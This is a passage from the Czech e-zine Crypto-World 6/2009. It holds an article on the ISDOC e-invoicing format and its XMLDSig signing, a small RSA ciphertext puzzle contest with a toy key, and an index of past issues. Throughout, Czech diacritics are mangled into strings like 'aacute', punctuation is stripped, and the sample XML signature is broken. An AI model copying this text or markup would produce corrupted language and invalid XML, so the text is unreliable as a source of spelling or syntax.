Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

